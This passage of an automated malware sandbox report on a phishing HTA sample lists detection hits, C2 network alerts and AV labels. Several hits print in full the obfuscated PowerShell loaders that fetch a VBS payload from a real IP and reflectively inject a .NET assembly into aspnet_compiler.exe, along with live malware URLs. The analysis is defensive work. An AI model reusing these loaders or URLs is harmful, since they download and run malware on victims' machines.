OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7184, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3676, ProcessName: aspnet_compiler.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3Rl
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline", ProcessId: 7924, ProcessName: csc.exe
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7648, TargetFilename: C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs" , ProcessId: 8044, ProcessName: wscript.exe
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7648, TargetFilename: C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))", CommandLine: "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICA

                    Data Obfuscation

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline", ProcessId: 7924, ProcessName: csc.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T09:50:13.615632+010020507451Malware Command and Control Activity Detected192.168.2.949840172.67.163.24580TCP
                    2024-11-26T09:50:38.575354+010020507451Malware Command and Control Activity Detected192.168.2.9498983.33.130.19080TCP
                    2024-11-26T09:50:53.107364+010020507451Malware Command and Control Activity Detected192.168.2.949934184.94.215.2680TCP
                    2024-11-26T09:51:09.262748+010020507451Malware Command and Control Activity Detected192.168.2.949972185.151.30.22180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T09:49:27.529386+010020490381A Network Trojan was detected193.30.119.205443192.168.2.949738TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T09:50:13.615632+010028554651A Network Trojan was detected192.168.2.949840172.67.163.24580TCP
                    2024-11-26T09:50:38.575354+010028554651A Network Trojan was detected192.168.2.9498983.33.130.19080TCP
                    2024-11-26T09:50:53.107364+010028554651A Network Trojan was detected192.168.2.949934184.94.215.2680TCP
                    2024-11-26T09:51:09.262748+010028554651A Network Trojan was detected192.168.2.949972185.151.30.22180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T09:50:30.515767+010028554641A Network Trojan was detected192.168.2.9498773.33.130.19080TCP
                    2024-11-26T09:50:33.157273+010028554641A Network Trojan was detected192.168.2.9498833.33.130.19080TCP
                    2024-11-26T09:50:35.909303+010028554641A Network Trojan was detected192.168.2.9498893.33.130.19080TCP
                    2024-11-26T09:50:45.134414+010028554641A Network Trojan was detected192.168.2.949914184.94.215.2680TCP
                    2024-11-26T09:50:47.837022+010028554641A Network Trojan was detected192.168.2.949921184.94.215.2680TCP
                    2024-11-26T09:50:50.452905+010028554641A Network Trojan was detected192.168.2.949927184.94.215.2680TCP
                    2024-11-26T09:51:00.868855+010028554641A Network Trojan was detected192.168.2.949950185.151.30.22180TCP
                    2024-11-26T09:51:03.849604+010028554641A Network Trojan was detected192.168.2.949957185.151.30.22180TCP
                    2024-11-26T09:51:06.613923+010028554641A Network Trojan was detected192.168.2.949966185.151.30.22180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T09:49:15.839512+010028587951A Network Trojan was detected192.168.2.949722146.70.155.25480TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://www.artherapy.online/1vmx/Avira URL Cloud: Label: malware
                    Source: http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFAvira URL Cloud: Label: malware
                    Source: creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaReversingLabs: Detection: 21%
                    Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.2565803965.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2276568583.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2567334619.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2573432013.0000000000E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1849072015.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                    Phishing

                    barindex
                    Source: Yara matchFile source: creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta, type: SAMPLE
                    Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.9:49738 version: TLS 1.2
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1360997024.000000000710E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1789795161.0000000007010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1791049317.000000000748A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TjxlUxenxgDChq.exe, 0000000E.00000000.1750598872.0000000000FCE000.00000002.00000001.01000000.0000000C.sdmp, TjxlUxenxgDChq.exe, 00000012.00000000.1900556011.0000000000FCE000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb( source: powershell.exe, 00000003.00000002.1360879801.00000000070EE000.00000004.00000020.00020000.00000000.sdmp
